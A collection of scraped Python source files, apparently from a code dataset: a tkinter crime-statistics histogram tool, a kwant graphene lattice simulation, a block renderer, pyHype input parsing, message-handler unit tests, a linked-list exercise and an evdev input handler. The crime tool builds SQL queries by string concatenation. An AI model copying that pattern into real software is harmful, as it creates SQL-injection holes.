tkinter.Canvas(self.__Window)\n self.__GraphCan.grid(row=2,column=1)\n\n def 
nextList(self,count):\n if count[0] < 28:\n count[0] += 1\n\n def prevList(self,count):\n if count[0] > 0:\n count[0] -= 1\n\n #Updates the Label on the tkinter Toplevel window\n def UpdateList(self,Lab,LText,count):\n self.updateText = LText[count[0]]\n Lab[\"text\"] = self.updateText\n self.__query = (\"SELECT * FROM crime WHERE crime LIKE '\" + self.updateText + \"'\")\n\n #Runs the functions listed below\n self.__QueryValues = self.fetchResults(self.__query)\n self.populateTree(self.__QueryValues)\n self.createIntervals()\n \n #Fetches and returns the Names of each Crime from the CrimeNames.json file\n def fetchNames(self):\n with open('C:/Users/Jody/Desktop/Python/Research_Project/CrimeNames.json', 'r') as Data:\n self.__data = json.load(Data)\n return(self.__data[\"CrimeNames\"])\n \n #Fetches and returns the results of a query\n def fetchResults(self,query):\n #Original\n # self.__connection = sqlite3.connect(\"C:/Users/Jody/Desktop/Python/Research_Project/CrimeData.db\")\n self.__connection = sqlite3.connect(\"C:/Users/Jody/Desktop/Python/Research_Project/PopulationPropCrimeData.db\")\n self.__cur = self.__connection.cursor()\n self.__cur.execute(query)\n self.__data = self.__cur.fetchall()\n self.__connection.close()\n return self.__data\n\n #Populates the Treeview tkinter widget\n def populateTree(self,Values):\n self.__crimeTree.delete(*self.__crimeTree.get_children())\n for x in range(len(Values)):\n self.__crimeTree.insert(\"\",'end',text=Values[x][1],values=(Values[x][3]))\n\n #Fetches a list of incidents from the database\n def getIncidents(self):\n self.__temp = []\n self.__query = (\"SELECT proportion FROM crime WHERE crime LIKE '\" + self.__CrimeList[self.__LabelCount[0]] + \"'\")\n #Original\n # self.__query = (\"SELECT incident FROM crime WHERE crime LIKE '\" + self.__CrimeList[self.__LabelCount[0]] + \"'\")\n self.__data = self.fetchResults(self.__query)\n for i in self.__data:\n self.__temp.append(i)\n return(self.__temp)\n\n def findQuartiles(self):\n self.__count = 0\n self.__Q1 = 0\n self.__Q2 = 0\n self.__Q3 = 0\n for x in self.__numbers:\n if self.__count == 75 or self.__count == 76:\n self.__Q2 = self.__Q2 + x\n elif self.__count == 38:\n self.__Q1 = x\n elif self.__count == 113:\n self.__Q3 = x\n self.__count+=1\n self.__Q2 = self.__Q2/2\n return(self.__Q1,self.__Q2,self.__Q3)\n\n #Creates bins for the incidents to be sorted into\n def createIntervals(self):\n self.__numbers = []\n self.__tuple = self.getIncidents()\n for x in range(len(self.__tuple)):\n self.__numbers.append(self.__tuple[x][0])\n\n self.__numbers.sort()\n\n self.ZVals = zscore(self.__numbers)\n #scipy cumulative freq table\n #self.__res = stats.cumfreq(self.__numbers, numbins=10)\n \n self.__std = numpy.std(self.__numbers)\n #Original\n # self.__Scott = math.ceil((3.49*self.__std*(len(self.__numbers))**(-1/3)))\n self.__Scott = ((3.49*self.__std*(len(self.__numbers))**(-1/3)))\n print(\"SC Rule: \",self.__Scott)\n\n self.__Q1,self.__Q2,self.__Q3 = self.findQuartiles()\n print(self.__Q1, self.__Q2, self.__Q3)\n self.__interQRange = self.__Q3-self.__Q1\n print(\"Interquartile Range: \", self.__interQRange)\n self.__innerFence = self.__interQRange*1.5\n self.__outerFence = self.__interQRange*3\n \n self.__innerBoundaryLow = self.__Q1 - self.__innerFence\n self.__innerBoundaryHigh = self.__Q3 + self.__innerFence\n self.__outerBoundaryLow = self.__Q1 - self.__outerFence\n self.__outerBoundaryHigh = self.__Q3 + self.__outerFence\n print(\"Inner Bounds: \", self.__innerBoundaryLow, \" - \", 
self.__innerBoundaryHigh)\n print(\"Outer Bounds: \", self.__outerBoundaryLow, \" - \", self.__outerBoundaryHigh)\n\n self.__FD = math.ceil(2*(self.__Q3-self.__Q1)*(len(self.__numbers))**(-1/3))\n print(\"FD Rule: \",self.__FD)\n print(\"LAST NUM : \",self.__numbers[-1])\n #Original\n # self.__TESTINTERVAL = math.ceil((self.__numbers[-1]-self.__numbers[0])/self.__Scott)\n self.__TESTINTERVAL = ((self.__numbers[-1]-self.__numbers[0])/self.__Scott)\n print(\"Bin Size: \",self.__TESTINTERVAL)\n\n self.__freq = []\n self.__intervals = []\n self.__count = 0\n\n self.__ploty = []\n #for a in range(self.__interval):\n for a in range(math.ceil(self.__Scott) + 1):\n self.__intervals.append(a*self.__TESTINTERVAL)\n self.__count += 1\n self.__ploty.append(a*self.__TESTINTERVAL)\n \n if self.__count == 2:\n self.__temp = [self.__intervals[0],self.__intervals[1]]\n self.__count = self.__count - 1\n self.__freq.append(self.__temp)\n del self.__intervals[0]\n\n #Counts the incidents per interval\n def sortIncidents(self):\n self.__incidents = []\n self.__numbers = []\n self.__omitted = []\n self.__tuple = self.getIncidents()\n self.__freq.sort()\n for x in range(len(self.__tuple)):\n self.__numbers.append(self.__tuple[x][0])\n\n for data in self.__numbers:\n found = None\n count = 0\n while found != True:\n #print(data, \" In: \", self.__freq[count][0], \" - \", self.__freq[count][1])\n if data > self.__outerBoundaryHigh:\n print(self.__outerBoundaryHigh)\n self.__omitted.append(data)\n found = True\n continue\n if data >= self.__freq[count][0] and data < self.__freq[count][1]:\n try:\n self.__incidents[count][0] = self.__incidents[count][0] + 1\n except IndexError:\n self.__incidents.append([1,self.__freq[count]])\n found = True\n count = count + 1\n \n print(\"Numbers omitted: \",self.__omitted)\n return self.__incidents\n\n #Plots the graph using the List created from sortIncidents\n def plotGraph(self):\n f = Figure(figsize=(10,5), dpi=100)\n a = f.add_subplot(111)\n self.__incidents = self.sortIncidents()\n self.__plotx = []\n self.__testFreq = []\n self.__numbers = self.ZVals\n for x in self.__incidents:\n self.__plotx.append(x[0])\n self.__testFreq.append(x[1])\n print(\"Length: \",range(len(self.__numbers)))\n negative = 0\n for i in range(len(self.__numbers)):\n for o in self.__omitted:\n if self.__numbers[i - negative] == o:\n negative = negative + 1\n del self.__numbers[i - negative]\n\n #a.hist(self.__plotx,self.__ploty,histtype='bar',rwidth=0.8)\n a.hist(self.__numbers,histtype='bar',rwidth=0.8)\n\n f.suptitle(self.__CrimeList[self.__LabelCount[0]])\n a.set_ylabel(\"Number of Stations\")\n a.set_xlabel(\"Number of Incidents\")\n\n #a.hist(self.plotZ(),rwidth=0.5)\n # print(\"Z-Scores: \",self.plotZ())\n print(\" \")\n self.exportCSV()\n self.__GraphCan = FigureCanvasTkAgg(f,self.__Window)\n self.__GraphCan.show()\n self.__GraphCan.get_tk_widget().grid(row=2,column=1)\n \n def plotZ(self):\n self.__total = 0\n for x in self.__numbers:\n self.__total += x\n self.__mean = (self.__total/len(self.__numbers))\n self.__ZValues = []\n self.__ZScores = [0,1,2]\n for i in self.__ZScores:\n self.__ZValues.append((i*self.__std)+self.__mean)\n return self.__ZValues\n\n def exportCSV(self):\n vals = [self.__Q1,self.__Q2,self.__Q3]\n # vals = self.plotZ()\n\n self.finalVals[self.updateText] = {}\n categories = {'One': 0, 'Two': 0, 'Three': 0, 'Four': 0}\n for x in self.__QueryValues:\n if(x[3] <= vals[0]):\n self.finalVals[self.updateText][x[1]] = 1\n categories['One'] = categories['One'] + 1\n # 
print(x[3], \" <= \", vals[0], \" ONE\")\n elif(x[3] <= vals[1] and x[3] > vals[0]):\n self.finalVals[self.updateText][x[1]] = 2\n categories['Two'] = categories['Two'] + 1\n # print(vals[0], \" > \", x[3], \" <= \", vals[1], \" TWO\")\n elif(x[3] <= vals[2] and x[3] > vals[1]):\n self.finalVals[self.updateText][x[1]] = 3\n categories['Three'] = categories['Three'] + 1\n # print(vals[1], \" > \", x[3], \" <= \", vals[2], \" THREE\")\n elif(x[3] > vals[2]):\n self.finalVals[self.updateText][x[1]] = 4\n categories['Four'] = categories['Four'] + 1\n # print(x[3], \" > \", vals[2], \" FOUR\")\n\n with open('C:/Users/Jody/Desktop/Python/Research_Project/SortedCrimeData.json', 'r') as File:\n temp = json.load(File)\n temp.update(self.finalVals)\n with open('C:/Users/Jody/Desktop/Python/Research_Project/SortedCrimeData.json', 'w') as Data:\n json.dump(temp,Data, indent=4)\n # print(categories['One'] + categories['Two'] + categories['Three'] + categories['Four'])\n # for each in categories:\n # print(each)\n # print(categories[each])\nmainWindow()","sub_path":"Project/FinalActualFinal.py","file_name":"FinalActualFinal.py","file_ext":"py","file_size_in_byte":12714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"438198624","text":"import kwant\nfrom math import pi,sqrt,tanh\nimport numpy as np\nfrom matplotlib import pyplot\nfrom kwant.digest import uniform\nfrom types import SimpleNamespace\n\npauli_z = np.array([[1,0],[0,-1]])\nsin_30, cos_30 = (1 / 2, sqrt(3) / 2)\ngraphene = kwant.lattice.general([(1, 0), (sin_30, cos_30)],\n\t\t\t\t\t\t\t\t [(0, 0), (0, 1 / sqrt(3))])\n\na, b = graphene.sublattices\n\ndef lin0(y,W,jw) :\n\tif y < -jw :\n\t\treturn -2 \n\telif -jw <= y < jw :\n\t\treturn 2*y/jw\n\telse :\n\t\treturn 2\n\ndef lin1(y,W,jw) :\n\tif y < -W/6-jw :\n\t\treturn -2 \n\telif -W/6-jw <= y < -W/6+jw :\n\t\treturn (y+W/6)/jw - 1\n\telif -W/6+jw <= y < W/6-jw :\n\t\treturn 0\n\telif W/6-jw <= y < W/6+jw :\n\t\treturn (y-W/6)/jw + 1\n\telse :\n\t\treturn 2\n\ndef lin2(y,W,jw) :\n\tif y < -jw :\n\t\treturn 0 \n\telif -jw <= y < jw :\n\t\treturn y/jw+1\n\telse :\n\t\treturn 2\n\ndef tan_lin0(y,W,jw) :\n\treturn tanh((y)/(jw/2))\n\ndef tan_lin1(y,W,jw) :\n\treturn 0.5*(tanh((y-1*W/20)/(jw/2))+tanh((y+1*W/20)/(jw/2)))\n\n\ndef make_system(W = 10*sqrt(3), L = 10, delta = 0, t = 1.6, lambda_so = 0) :\n\t\n\tlambda_so = 1j*lambda_so/(3*sqrt(3))\n\tt_nn1_a = 1 * lambda_so * pauli_z # [ 1, 0]\n\tt_nn1_b = -1 * lambda_so * pauli_z\n\tt_nn2_a = -1 * lambda_so * pauli_z # [ 0, 1]\n\tt_nn2_b = 1 * lambda_so * pauli_z\n\tt_nn3_a = -1 * lambda_so * pauli_z # [ 1, -1]\n\tt_nn3_b = 1 * lambda_so * pauli_z\n\tWex = 0 \n\n\tdef channel(pos):\n\t\tx, y = pos\n\t\treturn (0 <= x <= L) and (-(W/2+Wex) < y <= (W/2+Wex)) \n\n\tsyst = kwant.Builder()\n\t\n\tdel_fn = lambda y,W : tan_lin1(y,W,W/20) \t\n\t\n\tdef potential(site, U, U_disorder, Mex, salt):\n\t\t(x, y) = site.pos\n\t\td = -1\n\t\tif (site.family == a) :\n\t\t\td = 1\n\t\tterm1 = d*delta*del_fn(y,W)*np.eye(2)\n\t\tterm2 = U*np.eye(2)\n\t\tterm3 = Mex*pauli_z\n\t\tterm4 = U_disorder * (uniform(repr(site), repr(salt)) - 0.5) * np.eye(2)\n\t\treturn term1 + term2 + term3 + term4\n\n\n\tdef dummy(site, Mex):\n\t\t(x, y) = site.pos\n\t\td = -1\n\t\tif (site.family == a) :\n\t\t\td = 1\n\t\tterm1 = d*delta*del_fn(y,W)*np.eye(2)\n\t\tterm2 = Mex*pauli_z\n\t\treturn term1 + term2\n\n\n\tsyst[graphene.shape(channel, (0, 0))] = potential\n\thoppings = (((0, 0), a, b), ((0, 1), a, b), ((-1, 1), a, 
b))\n\tsyst[[kwant.builder.HoppingKind(*hopping) for hopping in hoppings]] = -t*np.eye(2)\n\tsyst[kwant.builder.HoppingKind((1, 0), a, a)] = t_nn1_a\n\tsyst[kwant.builder.HoppingKind((1, 0), b, b)] = t_nn1_b\n\tsyst[kwant.builder.HoppingKind((0, 1), a, a)] = t_nn2_a\n\tsyst[kwant.builder.HoppingKind((0, 1), b, b)] = t_nn2_b\n\tsyst[kwant.builder.HoppingKind((1, -1), a, a)] = t_nn3_a\n\tsyst[kwant.builder.HoppingKind((1, -1), b, b)] = t_nn3_b\n\n\t# left lead\n\tsym0 = kwant.TranslationalSymmetry(graphene.vec((-1, 0)))\n\tsym0.add_site_family(graphene.sublattices[0], other_vectors=[(-1, 2)])\n\tsym0.add_site_family(graphene.sublattices[1], other_vectors=[(-1, 2)])\n\n\tdef lead0_shape(pos):\n\t\tx, y = pos\n\t\treturn (-(W/2+Wex) < y <= (W/2+Wex))\n\n\tlead0 = kwant.Builder(sym0)\n\tlead0[graphene.shape(lead0_shape, (0, 0))] = np.zeros((2,2))\n\tlead0[[kwant.builder.HoppingKind(*hopping) for hopping in hoppings]] = -t*np.eye(2)\n\t#lead0[kwant.builder.HoppingKind((1, 0), a, a)] = t_nn1_a\n\t#lead0[kwant.builder.HoppingKind((1, 0), b, b)] = t_nn1_b\n\t#lead0[kwant.builder.HoppingKind((0, 1), a, a)] = t_nn2_a\n\t#lead0[kwant.builder.HoppingKind((0, 1), b, b)] = t_nn2_b\n\t#lead0[kwant.builder.HoppingKind((1, -1), a, a)] = t_nn3_a\n\t#lead0[kwant.builder.HoppingKind((1, -1), b, b)] = t_nn3_b\n\n\t# right lead\n\tsym1 = kwant.TranslationalSymmetry(graphene.vec((1, 0)))\n\tsym1.add_site_family(graphene.sublattices[0], other_vectors=[(-1, 2)])\n\tsym1.add_site_family(graphene.sublattices[1], other_vectors=[(-1, 2)])\n\n\tdef lead1_shape(pos):\n\t\tx, y = pos\n\t\treturn (-(W/2+Wex) < y <= (W/2+Wex))\n\n\tlead1 = kwant.Builder(sym1)\n\tlead1[graphene.shape(lead1_shape, (0, 0))] = np.zeros((2,2))\n\tlead1[[kwant.builder.HoppingKind(*hopping) for hopping in hoppings]] = -t*np.eye(2)\n\t#lead1[kwant.builder.HoppingKind((1, 0), a, a)] = t_nn1_a\n\t#lead1[kwant.builder.HoppingKind((1, 0), b, b)] = t_nn1_b\n\t#lead1[kwant.builder.HoppingKind((0, 1), a, a)] = t_nn2_a\n\t#lead1[kwant.builder.HoppingKind((0, 1), b, b)] = t_nn2_b\n\t#lead1[kwant.builder.HoppingKind((1, -1), a, a)] = t_nn3_a\n\t#lead1[kwant.builder.HoppingKind((1, -1), b, b)] = t_nn3_b\n\n\t# dummy lead\n\tdum_sym = kwant.TranslationalSymmetry(graphene.vec((1, 0)))\n\tdum_sym.add_site_family(graphene.sublattices[0], other_vectors=[(-1, 2)])\n\tdum_sym.add_site_family(graphene.sublattices[1], other_vectors=[(-1, 2)])\n\t\n\tdef dum_lead_shape(pos):\n\t\tx, y = pos\n\t\treturn (-(W/2+Wex) < y <= (W/2+Wex))\n\n\tdum_lead = kwant.Builder(dum_sym)\n\tdum_lead[graphene.shape(dum_lead_shape, (0, 0))] = dummy\n\tdum_lead[[kwant.builder.HoppingKind(*hopping) for hopping in hoppings]] = -t*np.eye(2)\n\tdum_lead[kwant.builder.HoppingKind((1, 0), a, a)] = t_nn1_a\n\tdum_lead[kwant.builder.HoppingKind((1, 0), b, b)] = t_nn1_b\n\tdum_lead[kwant.builder.HoppingKind((0, 1), a, a)] = t_nn2_a\n\tdum_lead[kwant.builder.HoppingKind((0, 1), b, b)] = t_nn2_b\n\tdum_lead[kwant.builder.HoppingKind((1, -1), a, a)] = t_nn3_a\n\tdum_lead[kwant.builder.HoppingKind((1, -1), b, b)] = t_nn3_b\n\n\treturn syst, [lead0, lead1], dum_lead\n \nW = 90*sqrt(3)\n# L = 100\n# t = 1.3\n# grid = (1/2)*sqrt(3)*pi*(t/W)\n# E = t/3\n# U = E\n# print(E)\n# lambda_so = 0.04\n# delta = -1*(0.1+lambda_so)\n# print(np.abs(delta)-lambda_so)\n# U_disorder = 0*(np.abs(delta)-lambda_so)\n# print(U_disorder)\n# Px = 0\n# Py = 0\n# Pz = 0\n# salt = 0\n\n# params = dict(U = U, U_disorder = U_disorder, Mex = 0, Px = Px, Py = Py, Pz = Pz, salt = salt)\n\n# syst, leads, dum_lead = make_system(W = W, 
L = L, delta = delta, t = t, lambda_so = lambda_so)\n\n# #def family_colors(site):\n# #\treturn 0 if (site.family == a) else 1\n# # Plot the closed system without leads.\n# #kwant.plot(syst, site_color=family_colors, site_lw=0.1, colorbar=False)\n\n# for lead in leads:\n\t# syst.attach_lead(lead)\n\n# syst = syst.finalized()\n# #kwant.plot(syst, site_lw=0.1, colorbar=False)\n\n# print('hi')\n# local_dos = kwant.ldos(syst,energy=E,params=params)\n# kwant.plotter.map(syst, local_dos[1::2],vmax = 0.01, num_lead_cells=0, a=1/sqrt(3))\n\n \n \n \n ","sub_path":"silicene_lattice_test.py","file_name":"silicene_lattice_test.py","file_ext":"py","file_size_in_byte":5991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"364025693","text":"import operator as op\nfrom typing import TYPE_CHECKING, List, Tuple, Dict\n\nimport numpy as np\n\nfrom utils import get_odd_even\n\nif TYPE_CHECKING:\n from .classes import Block\n\n\nclass ElementRenderer:\n \"\"\"\n Render based on the `elements` prop of the model\n \"\"\"\n\n @property\n def directions(self):\n \"\"\"\n :return: Dictionary containing the direction vectors of the plane\n \"\"\"\n return {\n # X-Z plane\n 'down': ([1, 0, 0], [0, 0, 1]),\n 'up': ([1, 0, 0], [0, 0, 1]),\n # Y-Z plane\n 'east': ([0, 0, 1], [0, 1, 0]),\n 'west': ([0, 0, 1], [0, 1, 0]),\n # X-Y plane\n 'north': ([1, 0, 0], [0, 1, 0]),\n 'south': ([1, 0, 0], [0, 1, 0]),\n }\n\n @property\n def start_change(self):\n return {\n # one higher than down\n 'up': np.array([0, 1, 0]),\n # one to the right respective to east\n 'west': np.array([1, 0, 0]),\n # one forward respective to north\n 'south': np.array([0, 0, 1]),\n }\n\n def get_side_vertices(self, start: np.array, face: Tuple[str, Dict]):\n name, values = face\n # direction vectors multiplications\n r, s = get_odd_even(values.get('uv', [0, 0, 16, 16]))\n r = op.sub(*r[::-1]) * (1 / 16) # x direction\n s = op.sub(*s[::-1]) * (1 / 16) # z direction\n\n # use direction vectors to get the vertices of the plane\n u, v = np.array(self.directions[name])\n # the points have to be in this order!!\n p2 = start + r * u\n p3 = start + r*u + s*v\n p4 = start + s * v\n return np.array([start, p2, p3, p4]).flatten()\n\n def __call__(self, parent: \"Block\", *args, **kwargs) -> List[Tuple[str, np.array]]:\n for element in parent.model.elements:\n\n # change start based on face\n # e.g. 
move start up by 1 if we are on face='up'\n dx, dy, dz = (np.array(element['to']) - np.array(element['from'])) * (1 / 16)\n start_shift = {\n # one higher than down\n 'up': np.array([0, dy, 0]),\n # one to the right respective to east\n 'west': np.array([dx, 0, 0]),\n # one forward respective to north\n 'south': np.array([0, 0, dz]),\n }\n\n for face in element['faces'].items():\n face: Tuple[str, Dict]\n\n start = np.array(element['from']) * (1/16) + np.array(parent.pos)\n shift = start_shift.get(face[0], np.array([0, 0, 0]))\n start += shift\n\n vertices = self.get_side_vertices(start, face)\n\n # get texture (#{name}) refers to texture set on the model\n texture_name = face[1]['texture'][1:]\n face_texture = parent.model.textures[texture_name]\n yield face_texture, vertices\n\n\nif __name__ == '__main__':\n from utils.classes import Model, Block\n b = Block(0, 0, 0, 3)\n b.model = Model.from_name('spruce_stairs')\n b.get_faces()\n","sub_path":"utils/renders.py","file_name":"renders.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"557977745","text":"\"\"\"\nCopyright 2021 Mohamed Khalil\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\nhttp://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\n__REQUIRED__ = ['problem_type', 'IC_type', 'realplot', 'makeplot', 'time_it', 't_final', 'time_integrator',\n 'flux_function', 'CFL', 'flux_function', 'reconstruction_type', 'finite_volume_method', 'flux_limiter',\n 'gamma', 'R', 'rho_inf', 'a_inf', 'nx', 'ny', 'mesh_name', 'profile']\n\n__OPTIONAL__ = ['alpha', 'write_time']\n\n\nclass ProblemInput:\n def __init__(self, input_dict: dict, mesh_dict: dict):\n \"\"\"\n Sets required input parametes from input parameter dict. 
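Missing keys listed in __REQUIRED__ raise KeyError via _check_input_dict. 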
Initialized values to default, with the correct type\n \"\"\"\n\n # Check input dictionary to check if all required fields are present\n self._check_input_dict(input_dict)\n\n # REQUIRED\n\n # General parameters\n for req_name in __REQUIRED__:\n self.__setattr__(req_name, input_dict[req_name])\n\n self.n = input_dict['nx'] * input_dict['ny']\n self.mesh_inputs = mesh_dict\n\n # OPTIONAL\n for opt_name in __OPTIONAL__:\n if opt_name in input_dict.keys():\n self.__setattr__(opt_name, input_dict[opt_name])\n\n @staticmethod\n def _check_input_dict(input_dict):\n for key in __REQUIRED__:\n if key not in input_dict.keys():\n raise KeyError(key + ' not found in inputs.')\n","sub_path":"pyHype/input/input_file_builder.py","file_name":"input_file_builder.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"460461796","text":"'''\nCreated on 27 Dec 2013\n\n@author: kevin\n'''\nimport unittest\nimport queue\nfrom messagehandler.messagehandler import NoResponseQueueDefined\nfrom messagehandler.messagehandler import NoMessageDefined\nfrom messagehandler.messagehandler import MessageHandler\nfrom keywordhandler.echohandler import EchoHandler\n\n\nclass Test(unittest.TestCase):\n\n\n def setUp(self):\n self.queue = queue.Queue()\n self.mh = MessageHandler(self.queue)\n \n # Register the echo handler as well\n EchoHandler(self.mh)\n \n self.message_a = \"@ help blabla\"\n self.message_b = \"@ foo\"\n self.message_c = \"@ echo my_echo\"\n\n def tearDown(self):\n pass\n\n def test_no_response_queue_defined(self):\n self.assertRaises(NoResponseQueueDefined, lambda: MessageHandler())\n\n def test_response_queue_defined(self):\n q = queue.Queue()\n MessageHandler(q)\n self.assertTrue(True, \"No exception should be raised\")\n \n def test_no_message_defined(self):\n self.assertRaises(NoMessageDefined, lambda: self.mh.handle(None, None))\n \n \n \n def test_tokenize_message_a(self):\n t = self.mh.tokenize(self.message_a)\n self.assertEqual(\"@\", t.magic_token(), \"Magic token must be '@'\")\n self.assertEqual(\"help\", t.keyword(), \"Keyword must be 'help'\")\n self.assertEqual(\"blabla\", t.string(), \"String must be 'blabla'\")\n \n def test_message_a_defined(self):\n self.mh.handle(None, self.message_a)\n m = self.queue.get()\n self.assertTrue(m.response().string.startswith(\"Usage information\"), \"Should provide usage information\")\n \n \n \n def test_tokenize_message_b(self):\n t = self.mh.tokenize(self.message_b)\n self.assertEqual(\"@\", t.magic_token(), \"Magic token must be '@'\")\n self.assertEqual(\"foo\", t.keyword(), \"Keyword must be 'foo'\")\n self.assertEqual(\"\", t.string(), \"String must be empty\")\n\n def test_message_b_defined(self):\n self.mh.handle(None, self.message_b)\n m = self.queue.get()\n self.assertTrue(m.response().string.startswith(\"Sorry, I don't understand the command\"), \"Should provide usage information\")\n self.assertTrue(self.queue.empty())\n \n \n \n def test_tokenize_message_c(self):\n t = self.mh.tokenize(self.message_c)\n self.assertEqual(\"@\", t.magic_token(), \"Magic token must be '@'\")\n self.assertEqual(\"echo\", t.keyword(), \"Keyword must be 'echo'\")\n self.assertEqual(\"my_echo\", t.string(), \"String must be 'my_echo'\")\n \n def test_message_c_defined(self):\n self.mh.handle(None, self.message_c)\n m = self.queue.get()\n self.assertEqual(m.response().string, \"my_echo\", \"Should use the echo handler\")\n \n\n \n def test_nondefault_magic_token(self):\n 
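# a custom '#' magic token should behave just like the default '@' (echo returns 'bar baz')\n 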
message = \"# echo bar baz\"\n q = queue.Queue()\n mh = MessageHandler(response_queue = q, magic_token = \"#\")\n EchoHandler(mh)\n \n mh.handle(None, message)\n m = q.get()\n self.assertEqual(m.response().string, \"bar baz\", \"Should use the echo handler\")","sub_path":"src/messagehandler/messagehandler_test.py","file_name":"messagehandler_test.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"190281719","text":"'''\ncreated by goblinM\n打印两个有序链表的公共部分\n思路:\n1->2->3->5->6->7\n2->4->5->6->8\n公有部分:2,5,6\n ·head1.val < head2.val,head1下移\n ·head1.val > head2.val,head2下移\n ·head1.val == head2.val 打印这个值,存入,head1,head2都下移\n ·head1 或者head2中移动到none,则停止\n'''\n\nclass LinkNode:\n def __init__(self,val,next=None):\n self.val = val\n self.next = next\n\nclass CommonLink:\n def get_common(self,link1,link2):\n head1 = link1\n head2 = link2\n res = []\n while head1 and head2:\n if head1.val< head2.val:\n head1 = head1.next\n elif head1.val > head2.val:\n head2 = head2.next\n else:\n res.append(head1.val)\n head1 = head1.next\n head2 = head2.next\n\n return res\n\nif __name__ == \"__main__\":\n obj = CommonLink()\n link1 = LinkNode(1,LinkNode(2,LinkNode(3,LinkNode(5,LinkNode(6,LinkNode(7))))))\n link2 = LinkNode(1, LinkNode(2, LinkNode(4, LinkNode(5, LinkNode(6, LinkNode(8))))))\n print(obj.get_common(link1,link2))","sub_path":"pythonPractices/link/common_link.py","file_name":"common_link.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"214637318","text":"# Copyright (c) 2016, Jacek Konieczny\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\nimport time\nimport logging\nimport re\nimport math\nimport asyncio\n\nimport evdev\nfrom evdev.ecodes import EV_KEY, EV_ABS\n\nfrom .base import EventHandler, BaseInputDevice\n\nlogger = logging.getLogger(\"input.evdev\")\n\nclass KeyEventHandler(EventHandler):\n def interpret_event(self, event):\n if event.keystate == event.key_down:\n return \"on\"\n elif event.keystate == event.key_up:\n return \"off\"\n else:\n return \"ignore\"\n\nclass AbsEventHandler(EventHandler):\n def __init__(self, device, key, settings):\n super().__init__(device, key, settings)\n self._last_value = None\n self._last_value_ts = None\n self._min = None\n self._max = None\n self._thres_low = None\n self._thres_high = None\n self._velocity = None\n self._velocity_coeff = float(settings.get(\"velocity_coeff\", 2.0))\n etype, ecode = key\n abs_caps = device.device.capabilities(absinfo=True)[etype]\n for code, absinfo in abs_caps:\n if code == ecode:\n break\n else:\n logger.error(\"Cannot retrieve absinfo for %r\", ecode)\n return\n self._min = absinfo.min\n self._max = absinfo.max\n self._range = absinfo.max - absinfo.min\n def val_to_abs(val):\n if not val.endswith(\"%\"):\n return float(val)\n pcent = float(val[:-1])\n return self._min + pcent * (self._max - self._min) / 100.0\n if \"thres_low\" in settings:\n self._thres_low = val_to_abs(settings[\"thres_low\"])\n else:\n self._thres_low = self._min\n if \"thres_high\" in settings:\n self._thres_high = val_to_abs(settings[\"thres_high\"])\n else:\n self._thres_high = self._max\n\n def get_velocity(self):\n if self._velocity is not None:\n return self._velocity\n else:\n return super().get_velocity()\n\n def _compute_velocity(self, value, event_ts):\n if not self._range:\n self._velocity = None\n return\n rel_change = float(value - self._last_value) / self._range\n if rel_change > 0 and self._last_value < self._thres_low:\n # the low value could be collected before the move started\n velocity = math.inf\n elif rel_change < 0 and self._last_value > self._thres_high:\n # the high value can be collected before the move started\n velocity = math.inf\n else:\n time_change = event_ts - self._last_value_ts\n velocity = abs(rel_change / time_change)\n logger.debug(\"unscaled velocity: %f\", velocity)\n if velocity != math.inf:\n velocity = int(velocity * self._velocity_coeff)\n if velocity < 0:\n self._velocity = 0\n elif velocity > 127:\n self._velocity = 127\n else:\n self._velocity = velocity\n\n def interpret_event(self, event):\n value = event.event.value\n event_ts = event.event.timestamp()\n if self._last_value is None:\n result = \"ignore\"\n elif value > self._last_value:\n # rising\n if value > self._thres_high and self._last_value < self._thres_high:\n result = \"on\"\n self._compute_velocity(value, event_ts)\n else:\n result = \"ignore\"\n elif value < self._last_value:\n # falling\n if value < self._thres_low and self._last_value > self._thres_low:\n result = \"off\"\n self._compute_velocity(value, event_ts)\n else:\n result = 
